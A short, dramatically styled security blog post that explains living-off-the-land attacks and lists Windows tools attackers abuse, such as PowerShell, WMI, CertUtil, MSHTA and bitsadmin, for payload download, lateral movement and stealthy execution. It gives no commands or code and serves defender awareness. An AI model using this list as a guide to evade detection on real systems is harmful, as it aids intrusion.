The breach doesn’t always come with malware.
Sometimes the threat is already inside – your own tools, turned against you.
Attackers know the terrain. They don’t bring weapons. They sharpen yours.
LOLBins – Native, Trusted, Dangerous
- PowerShell – The Swiss Army knife of abuse. Recon, lateral movement, payload download, persistence – all from a signed shell.
- WMI – Silent execution across machines. Perfect for stealthy command delivery without touching disk.
- CertUtil – Meant for certs. Abused for file transfers and base64 decoding in plain sight.
- MSHTA – Executes HTML applications. No alerts. No rules.
- rundll32, regsvr32, schtasks, bitsadmin – System-native. Hard to block. Easy to script.
No exploits. No noise. Just your system, obeying new masters.
Defenders look for the foreign.
Attackers live off the familiar.
If you trust it, they weaponize it.
DeadSwitch | The Cyber Ghost
“In silence, we rise. In the switch, we fade.”
Tom's IT Cafe 